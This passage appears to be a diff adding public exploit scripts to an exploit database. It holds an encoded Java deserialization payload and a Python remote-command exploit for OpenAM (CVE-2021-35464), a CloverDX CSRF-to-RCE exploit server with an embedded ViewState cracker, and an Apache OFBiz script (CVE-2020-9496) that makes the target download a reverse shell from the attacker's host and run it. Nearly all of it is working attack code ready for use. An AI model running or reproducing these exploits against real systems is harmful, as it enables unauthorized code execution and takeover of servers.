TtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwDPAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAAWUBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAA2NscwEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAEdmFyNQEAIUxqYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uOwEABGNtZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAGcmVzdWx0AQACW0IBAAlwcm9jZXNzb3IBABJMamF2YS9sYW5nL09iamVjdDsBAANyZXEBAARyZXNwAQABagEAAUkBAAF0AQASTGphdmEvbGFuZy9UaHJlYWQ7AQADc3RyAQASTGphdmEvbGFuZy9TdHJpbmc7AQADb2JqAQAKcHJvY2Vzc29ycwEAEExqYXZhL3V0aWwvTGlzdDsBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAAFpAQAEZmxhZwEAAVoBAAVncm91cAEAF0xqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQABZgEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAd0aHJlYWRzAQATW0xqYXZhL2xhbmcvVGhyZWFkOwEADVN0YWNrTWFwVGFibGUHANAHANEHANIHAKcHAKMHAJoHAJ0HAGMHAMgHAMsBAApTb3VyY2VGaWxlAQAVVG9tY2F0RWNob0luamVjdC5qYXZhDABHAEgHANIMANMA1AwA1QDWDADXANgMANkA2gcA0QwA2wDcDADdAN4MAN8A4AEABGV4ZWMMAOEA4gEABGh0dHABAAZ0YXJnZXQBABJqYXZhL2xhbmcvUnVubmFibGUBAAZ0aGlzJDABAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24MAOMA2AEABmdsb2JhbAEADmphdmEvdXRpbC9MaXN0DADkAOUMAN0A5gEAC2dldFJlc3BvbnNlAQAPamF2YS9sYW5nL0NsYXNzDADnAOgBABBqYXZhL2xhbmcvT2JqZWN0BwDpDADqAOsBAAlnZXRIZWFkZXIBABBqYXZhL2xhbmcvU3RyaW5nAQADY21kDADsAO0BAAlzZXRTdGF0dXMMAO4AXwEAEWphdmEvbGFuZy9JbnRlZ2VyDABHAO8BAAdvcy5uYW1lBwDwDADxAPIMAPMA4AEABndpbmRvdwEAB2NtZC5leGUBAAIvYwEABy9iaW4vc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABHAPQMAPUA9gcA9wwA-AD5DABHAPoBAAJcQQwA-wD8DAD9AOAMAP4A_wEAJG9yZy5hcGFjaGUudG9tY2F0LnV0aWwuYnVmLkJ5dGVDaHVuawwBAAEBDAECAQMBAAhzZXRCeXRlcwwBBADoAQAHZG9Xcml0ZQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAEAE2phdmEvbGFuZy9FeGNlcHRpb24MAQUASAEAI3lzb3NlcmlhbC9wYXlsb2Fkcy9Ub21jYXRFY2hvSW5qZWN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAFWphdmEvbGFuZy9UaHJlYWRHcm91cAEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEADmdldFRocmVhZEdyb3VwAQAZKClMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAHZ2V0TmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAA1nZXRTdXBlcmNsYXNzAQAEc2l6ZQEAAygpSQEAFShJKUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdpc0VtcHR5AQADKClaAQAEVFlQRQEABChJKVYBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAEbmV4dAEACGdldEJ5dGVzAQAEKClbQgEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEAEWdldERlY2xhcmVkTWV0aG9kAQAPcHJpbnRTdGFja1RyYWNlACEARQBGAAAAAAAEAAEARwBIAAEASQAAAC8AAQABAAAABSq3AAGxAAAAAgBKAAAABgABAAAAEQBLAAAADAABAAAABQBMAE0AAAABAE4ATwACAEkAAAA_AAAAAwAAAAGxAAAAAgBKAAAABgABAAAAYABLAAAAIAADAAAAAQBMAE0AAAAAAAEAUABRAAEAAAABAFIAUwACAFQAAAAEAAEAVQABAE4AVgACAEkAAABJAAAABAAAAAGxAAAAAgBKAAAABgABAAAAZgBLAAAAKgAEAAAAAQBMAE0AAAAAAAEAUABRAAEAAAABAFcAWAACAAAAAQBZAFoAAwBUAAAABAABAFUACABbAEgAAQBJAAAF7QAIABEAAAMDAzu4AAK2AANMAU0rtgAEEgW2AAZNLAS2AAcsK7YACMAACcAACU4DNgQVBC2-ogLNLRUEMjoFGQXHAAanArkZBbYACjoGGQYSC7YADJoADRkGEg22AAyaAAanApsZBbYABBIOtgAGTSwEtgAHLBkFtgAIOgcZB8EAD5oABqcCeBkHtgAEEhC2AAZNLAS2AAcsGQe2AAg6BxkHtgAEEhG2AAZNpwAWOggZB7YABLYAE7YAExIRtgAGTSwEtgAHLBkHtgAIOgcZB7YABLYAExIUtgAGTacAEDoIGQe2AAQSFLYABk0sBLYABywZB7YACDoHGQe2AAQSFbYABk0sBLYABywZB7YACMAAFsAAFjoIAzYJFQkZCLkAFwEAogHLGQgVCbkAGAIAOgoZCrYABBIZtgAGTSwEtgAHLBkKtgAIOgsZC7YABBIaA70AG7YAHBkLA70AHbYAHjoMGQu2AAQSHwS9ABtZAxIgU7YAHBkLBL0AHVkDEiFTtgAewAAgOgYZBsYBVxkGtgAimgFPGQy2AAQSIwS9ABtZA7IAJFO2ABwZDAS9AB1ZA7sAJVkRAMi3ACZTtgAeVxInuAAotgApEiq2AAyZABkGvQAgWQMSK1NZBBIsU1kFGQZTpwAWBr0AIFkDEi1TWQQSLlNZBRkGUzoNuwAvWbsAMFkZDbcAMbYAMrYAM7cANBI1tgA2tgA3tgA4Og4SObgAOjoPGQ-2ADs6BxkPEjwGvQAbWQMSPVNZBLIAJFNZBbIAJFO2AD4ZBwa9AB1ZAxkOU1kEuwAlWQO3ACZTWQW7ACVZGQ6-twAmU7YAHlcZDLYABBI_BL0AG1kDGQ9TtgAcGQwEvQAdWQMZB1O2AB5XpwBOOg8SQbgAOjoQGRASQgS9ABtZAxI9U7YAPhkQBL0AHVkDGQ5TtgAeOgcZDLYABBI_BL0AG1kDGRBTtgAcGQwEvQAdWQMZB1O2AB5XBDsamQAGpwAJhAkBp_4vGpkABqcAEacACDoFpwADhAQBp_0ypwAISyq2AESxAAgAlwCiAKUAEgDFANMA1gASAhUCiAKLAEAAMAA7Au8AQwA-AFkC7wBDAFwAfALvAEMAfwLpAu8AQwAAAvoC_QBDAAMASgAAAQYAQQAAABUAAgAWAAkAFwALABgAFQAaABoAGwAmABwAMAAeADYAHwA-ACAARQAhAFwAIgBnACMAbAAkAHQAJQB_ACYAigAnAI8AKACXACoAogAtAKUAKwCnACwAuAAuAL0ALwDFADEA0wA0ANYAMgDYADMA4wA1AOgANgDwADcA-wA4AQAAOQEOADoBHQA7ASgAPAEzAD0BOAA-AUAAPwFZAEABfwBBAYwAQgG3AEMB8gBEAhUARgIcAEcCIwBIAmYASQKIAE4CiwBKAo0ASwKUAEwCtABNAtYATwLYAFEC3wA6AuUAUwLsAFYC7wBUAvEAVQL0ABwC-gBaAv0AWAL-AFkDAgBbAEsAAADeABYApwARAFwAXQAIANgACwBcAF0ACAIcAGwAXgBfAA8ClABCAF4AXwAQAo0ASQBgAGEADwHyAOYAYgBjAA0CFQDDAGQAZQAOASgBtwBmAGcACgFAAZ8AaABnAAsBWQGGAGkAZwAMAREB1ABqAGsACQA2ArYAbABtAAUARQKnAG4AbwAGAHQCeABwAGcABwEOAd4AcQByAAgC8QADAFwAcwAFACkC0QB0AGsABAACAvgAdQB2AAAACQLxAHcAeAABAAsC7wB5AHoAAgAmAtQAewB8AAMC_gAEAFwAcwAAAH0AAACoABf_ACkABQEHAH4HAH8HAAkBAAD8ABQHAID8ABoHAIEC_AAiBwCCZQcAgxJdBwCDDP0ALQcAhAH-AMsHAIIHAIIHAIJSBwCF_wCaAA8BBwB-BwB_BwAJAQcAgAcAgQcAggcAhAEHAIIHAIIHAIIHAIUHAD0AAQcAhvsASvkAAfgABvoABf8ABgAFAQcAfgcAfwcACQEAAEIHAIcE_wAFAAAAAEIHAIcEAAEAiAAAAAIAiXVxAH4AJAAAAdjK_rq-AAAANAAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAAMwABAAEAAAAFKrcAAbEAAAACAA0AAAAKAAIAAACUAAQAlQAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHNyABRqYXZhLm1hdGguQmlnSW50ZWdlcoz8nx-pO_sdAwAGSQAIYml0Q291bnRJAAliaXRMZW5ndGhJABNmaXJzdE5vbnplcm9CeXRlTnVtSQAMbG93ZXN0U2V0Qml0SQAGc2lnbnVtWwAJbWFnbml0dWRldAACW0J4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHD_______________7____-AAAAAXVxAH4AJAAAAAEBeHg$' + +## Ignore unsigned certs, if any because OpenAM is default HTTP +ssl._create_default_https_context = ssl._create_unverified_context + +def checkParams(options, args): + if args: sHost = args[0] + else: + sHost = input('[?] Please enter the URL ['+sURL+'] : ') + if sHost == '': sHost = sURL + if not sHost[-1:] == '/': sHost += '/' + if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost + if options.command: sCMD = options.command + else: sCMD = '' + if options.proxy: sProxy = options.proxy + else: sProxy = '' + return (sHost, sCMD, sProxy) + +def findEndpoint(oOpener, sHost, sProxy): + def testEndpoint(sURL): + oRequest = urllib.request.Request(sURL) + if sProxy: oRequest.set_proxy(sProxy, 'http') + try: oResponse = oOpener.open(oRequest, timeout = iTimeout) + except: return False + if oResponse.code == 200: + if 'ForgeRock' in oResponse.read().decode(errors='ignore'): + print('[+] Found potential vulnerable endpoint: ' + sURL) + return True + return False + + if testEndpoint(sHost + sEndpoint): return sHost + sEndpoint + elif testEndpoint(sHost + 'openam/' + sEndpoint): return sHost + 'openam/' + sEndpoint + elif testEndpoint(sHost + 'OpenAM/' + sEndpoint): return sHost + 'OpenAM/' + sEndpoint + elif testEndpoint(sHost + 'openam/ccversion/Version'): return sHost + 'openam/ccversion/Version' + elif testEndpoint(sHost + 'OpenAM/ccversion/Version'): return sHost + 'OpenAM/ccversion/Version' + else: return '' + +def testVuln(oOpener, sURL, sProxy): + oResponse = runCmd(oOpener, sURL, sProxy, 'echo CVE-2021-35464') + ## The response is actually not well formed HTTP, needs manual formatting + bResp = bytearray(15) ## "CVE-2021-35464\n" should be 15 bytes + try: oResponse.readinto(bResp) + except: pass + #print(bResp.split(b'\x00')[0]) + if 'CVE-2021-35464' in bResp.decode(): return True + else: return False + +def runVuln(oOpener, sURL, sProxy, sCMD): + oResponse = runCmd(oOpener, sURL, sProxy, sCMD) + ## The response is actually not well formed HTTP, needs manual formatting + bResp = bytearray(4096) + try: oResponse.readinto(bResp) + except: pass ## The readinto still should have worked + sResp = bResp.split(b'\x00')[0].decode() + print(sResp) + +def runCmd(oOpener, sURL, sProxy, sCMD): + oData = b'jato.pageSession=' + strSerializedPayload + oHeaders = {'cmd' : sCMD} + oRequest = urllib.request.Request(url = sURL, headers = oHeaders, data = oData) + if sProxy: oRequest.set_proxy(sProxy, 'http') + return oOpener.open(oRequest, timeout = iTimeout) + +def main(): + usage = ( + 'usage: %prog [options] URL \n' + 'Example: CVE-2021-35464.py -c id http://192.168.0.100:7080/openam\n' + 'Example: CVE-2021-35464.py -c dir -p 127.0.0.1:8080 http://192.168.0.100:7080/openam\n' + 'When in doubt, just enter a single IP address' + ) + + parser = optparse.OptionParser(usage=usage) + parser.add_option('--command', '-c', dest='command', help='Optional: The command to run remotely') + parser.add_option('--proxy', '-p', dest='proxy', help='Optional: HTTP proxy to use, e.g. 127.0.0.1:8080') + + ## Get or ask for the vars + (options, args) = parser.parse_args() + (sHost, sCMD, sProxy) = checkParams(options, args) + + ## Verify reachability + print('[!] Verifying reachability of ' + sHost) + oOpener = urllib.request.build_opener() + oRequest = urllib.request.Request(sHost) + if sProxy: oRequest.set_proxy(sProxy, 'http') + try: oResponse = oOpener.open(oRequest, timeout = iTimeout) + except urllib.error.HTTPError: pass + except: sys.exit('[-] Error, host ' + sHost + ' seems to be unreachable') + print('[+] Endpoint ' + sHost + ' reachable') + + ## Find endpoint + print('[!] Finding correct OpenAM endpoint') + sEndpoint = findEndpoint(oOpener, sHost, sProxy) + if sEndpoint == '': sys.exit('[-] Error finding the correct OpenAM endpoint or not vulnerable.') + + ## Verify vulnerability + if testVuln(oOpener, sEndpoint, sProxy): print('[+] !SUCCESS! Host ' + sHost + ' is vulnerable to CVE-2021-35464') + else: sys.exit('[-] Not vulnerable or this implementation does not work') + if sCMD: + print('[+] Running command "' + sCMD + '" now:\n') + runVuln(oOpener, sEndpoint, sProxy, sCMD) + else: print('[!] All done') + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/java/webapps/50166.py b/exploits/java/webapps/50166.py new file mode 100755 index 000000000..25edca226 --- /dev/null +++ b/exploits/java/webapps/50166.py @@ -0,0 +1,137 @@ +# Exploit Title: CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE) +# Date: 14.04.2021 +# Exploit Author: niebardzo +# Vendor Homepage: https://www.cloverdx.com/ +# Software Link: https://github.com/cloverdx/cloverdx-server-docker +# Version: 5.9.0, 5.8.1, 5.8.0, 5.7.0, 5.6.x, 5.5.x, 5.4.x +# Tested on: Docker image - https://github.com/cloverdx/cloverdx-server-docker +# CVE : CVE-2021-29995 + +# Replace the target, payload and port to host the exploitation server. Exploit requires, inbound connection to CloverDX +# Victim authenticated to CloverDX and the java to run the ViewStateCracker.java. +# Reference for cracking ViewState: +# https://jazzy.id.au/2010/09/20/cracking_random_number_generators_part_1.html +# https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2 +# + + +import http.server +import socketserver +import requests +from urllib.parse import urlparse +from urllib.parse import parse_qs +from bs4 import BeautifulSoup +import subprocess +import sys +import json + + +class ExploitHandler(http.server.SimpleHTTPRequestHandler): + def do_GET(self): + self.send_response(200) + self.send_header("Content-Type", "text/html; charset=utf-8") + self.end_headers() + + # replace with your own target + target = "http://localhost:8080" + + query_comp = parse_qs(urlparse(self.path).query) + if "target" in query_comp: + target = query_comp["target"][0] + + req = requests.get(target+"/clover/gui/login.jsf") + + if req.status_code != 200: + sys.exit(-1) + + # parse the reponse retrieve the ViewState + soup = BeautifulSoup(req.text, "html.parser") + cur_view_state = soup.find("input", {"name": "javax.faces.ViewState"})["value"] + + # Use the ViewstateCracker.java to get new Viewstate. + new_view_state = subprocess.check_output(["java", "ViewstateCracker.java", cur_view_state]) + new_view_state = new_view_state.decode("utf-8").strip() + print(new_view_state) + if new_view_state == "6927638971750518694:6717304323717288036": + html = ("

Hello Clover Admin!


" + + "") + else: + html = ("" + + "" + + "

Hello Clover Admin! Please wait here, content is loading...

" + + "" + + " " + + " " + + " " + + " " + + "" + + "" + + "" + + "" + + "") + + self.wfile.write(bytes(html,"utf-8")) + + +base64_enc_viewstatecracker = "CnB1YmxpYyBjbGFzcyBWaWV3c3RhdGVDcmFja2VyIHsKICAvKiBTVEFSVCBQQVJUIDEgKi8KICBwdWJsaWMgc3RhdGljIGZpbmFsIGludCBvZmZzZXQgICAgID0gMzI7CiAgcHVibGljIHN0YXRpYyBmaW5hbCBpbnQgaXRlcmF0aW9ucyA9IDY1NTM2OwoKICBwdWJsaWMgc3RhdGljIGZpbmFsIFN0cmluZyBnZW5lcmF0ZU5ld1ZpZXdzdGF0ZShmaW5hbCBsb25nIGlkSW5Mb2dpY2FsTWFwLCBmaW5hbCBsb25nIGlkSW5BY3R1YWxNYXApIHsKICAgIGZpbmFsIGxvbmcgZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwICA9IGlkSW5Mb2dpY2FsTWFwID4+PiBvZmZzZXQ7CiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXAgPSAoKGlkSW5Mb2dpY2FsTWFwIDw8IG9mZnNldCkgPj4+IG9mZnNldCk7CiAgICBmaW5hbCBsb25nIGZpcnN0MzJCaXRzT2ZJZEluQWN0dWFsTWFwICAgPSBpZEluQWN0dWFsTWFwID4+PiBvZmZzZXQ7ICAgICAgICAgLy8gVmVyaWZpY2F0aW9uCiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkFjdHVhbE1hcCAgPSAoKGlkSW5BY3R1YWxNYXAgPDwgb2Zmc2V0KSA+Pj4gb2Zmc2V0KTsgLy8gVmVyaWZpY2F0aW9uCiAgICAvKiBFTkQgUEFSVCAxICovCgogICAgLyogU1RBUlQgUEFSVCAyICovCiAgICBsb25nIHRoZV9zZWVkID0gMUw7CgogICAgZm9yIChpbnQgaSA9IDA7IGkgPCBpdGVyYXRpb25zOyBpKyspIHsKICAgICAgbG9uZyB0bXBfc2VlZCA9ICgoZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwIDw8IDE2KSArIGkpOwogICAgICBpZiAoKChpbnQpKCgodG1wX3NlZWQgKiAweDVERUVDRTY2REwgKyAweEJsKSAmICgoMUwgPDwgNDgpIC0gMSkpID4+PiAxNikpID09IHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXApIHsKICAgICAgICAvL1N5c3RlbS5vdXQucHJpbnRsbigiU2VlZCBmb3VuZDogIiArIHRtcF9zZWVkKTsKICAgICAgICB0aGVfc2VlZCA9IHRtcF9zZWVkOwogICAgICAgIGJyZWFrOwogICAgICB9CiAgICB9CiAgICAvKiBFTkQgUEFSVCAyICovCgogICAgLyogU1RBUlQgUEFSVCAzICovCiAgICAvLyBHZW5lcmF0ZSBudW1iZXIgMiAoU2Vjb25kIE51bWJlciBvZiBpZEluTG9naWNhbE1hcCkKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwoKICAgIC8vQ2FsY3VsYXRlIHRoZSB2YWx1ZSBvZiBpZEluQWN0dWFsTWFwCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgLyogRU5EIFBBUlQgMyovCgogICAgLyogU1RBUlQgUEFSVCA0Ki8KICAgIC8qIENhbGN1bGF0ZSBhIG5ldyBpZEluTG9naWNhbE1hcCAqLwoKICAgIC8vIEdlbmVyYXRlIHRoZSBmaXJzdCBoYWxmIG9mIHRoZSBmaXJzdCBMb25nCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIGludCBudW1iZXJfNSA9ICgoaW50KSh0aGVfc2VlZCA+Pj4gMTYpKTsKCiAgICAvLyBHZW5lcmF0ZSB0aGUgc2Vjb25kIGhhbGYgb2YgdGhlIGZpcnN0IExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl82ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vSGVyZSBpcyB0aGUgbmV3IGlkSW5Mb2dpY2FsTWFwCiAgICBsb25nIG5ld19sb25nXzEgPSAoKChsb25nKW51bWJlcl81IDw8IDMyKSArIG51bWJlcl82KTsKCgogICAgLyogQ2FsY3VsYXRlIGEgbmV3IGlkSW5BY3R1YWxNYXAgKi8KCiAgICAvLyBHZW5lcmF0ZSB0aGUgZmlyc3QgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl83ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vIEdlbmVyYXRlIHRoZSBzZWNvbmQgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl84ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vCiAgICBsb25nIG5ld19sb25nXzIgPSAoKChsb25nKW51bWJlcl83IDw8IDMyKSArIG51bWJlcl84KTsKCiAgICByZXR1cm4gbmV3X2xvbmdfMSArICI6IiArIG5ld19sb25nXzI7CiAgICAvKkVORCBQQVJUNCovCiAgfQogcHVibGljIHN0YXRpYyB2b2lkIG1haW4gKFN0cmluZyBhcmdzW10pIHsKCVN0cmluZyB0b2tlbiA9IGFyZ3NbMF07CglTdHJpbmdbXSBsb25ncyA9IHRva2VuLnNwbGl0KCI6Iik7Cglsb25nIGxvbmcxID0gTG9uZy5wYXJzZUxvbmcobG9uZ3NbMF0pOwoJbG9uZyBsb25nMiA9IExvbmcucGFyc2VMb25nKGxvbmdzWzFdKTsKCVN0cmluZyBuZXdUb2tlbiA9IGdlbmVyYXRlTmV3Vmlld3N0YXRlKGxvbmcxLGxvbmcyKTsKCVN5c3RlbS5vdXQucHJpbnRsbihuZXdUb2tlbik7Cgp9Cgp9Cg==" + +# +# This drops ViewstateCracker.java from above, ref: https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2 +# + +with open("ViewstateCracker.java","w") as f: + f.write(b64decode(bytes(base64_enc_viewstatecracker, 'utf-8')).decode('utf-8')) + + +exploit_handler = ExploitHandler + +PORT = 6010 + +exploit_server = socketserver.TCPServer(("", PORT), exploit_handler) + +exploit_server.serve_forever() \ No newline at end of file diff --git a/exploits/java/webapps/50178.sh b/exploits/java/webapps/50178.sh new file mode 100755 index 000000000..eeb402cca --- /dev/null +++ b/exploits/java/webapps/50178.sh @@ -0,0 +1,78 @@ +# Exploit Title: ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments +# Date: 2021-08-04 +# Exploit Author: Álvaro Muñoz, Adrián Díaz (s4dbrd) +# Vendor Homepage: https://ofbiz.apache.org/index.html +# Software Link: https://archive.apache.org/dist/ofbiz/apache-ofbiz-17.12.01.zip +# Version: 17.12.01 +# Tested on: Linux + +# CVE : CVE-2020-9496 + +# Reference: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/ + +# Description: This CVE was discovered by Alvaro Muñoz, but I have created this POC to automate the process and the necessary requests to successfully exploit it and get RCE. + +#!/usr/bin/env bash + +# Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization. +# This issue was reported to the security team by Alvaro Munoz pwntester@github.com from the GitHub Security Lab team. +# +# This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc. +# A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution. +# +# Steps to exploit: +# +# Step 1: Host HTTP Service with python3 (sudo python3 -m http.server 80) +# Step 2: Start nc listener (Recommended 8001). +# Step 3: Run the exploit. + + +url='https://127.0.0.1' # CHANGE THIS +port=8443 # CHANGE THIS + +function helpPanel(){ + echo -e "\nUsage:" + echo -e "\t[-i] Attacker's IP" + echo -e "\t[-p] Attacker's Port" + echo -e "\t[-h] Show help pannel" + exit 1 +} + + +function ctrl_c(){ + echo -e "\n\n[!] Exiting...\n" + exit 1 +} +# Ctrl + C +trap ctrl_c INT + +function webRequest(){ + echo -e "\n[*] Creating a shell file with bash\n" + echo -e "#!/bin/bash\n/bin/bash -i >& /dev/tcp/$ip/$ncport 0>&1" > shell.sh + echo -e "[*] Downloading YsoSerial JAR File\n" + wget -q https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar + echo -e "[*] Generating a JAR payload\n" + payload=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "wget $ip/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n") + echo -e "[*] Sending malicious shell to server...\n" && sleep 0.5 + curl -s $url:$port/webtools/control/xmlrpc -X POST -d "ProjectDiscoverytest$payload" -k -H 'Content-Type:application/xml' &>/dev/null + echo -e "[*] Generating a second JAR payload" + payload2=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n") + echo -e "\n[*] Executing the payload in the server...\n" && sleep 0.5 + curl -s $url:$port/webtools/control/xmlrpc -X POST -d "ProjectDiscoverytest$payload2" -k -H 'Content-Type:application/xml' &>/dev/null + echo -e "\n[*]Deleting Files..." + rm 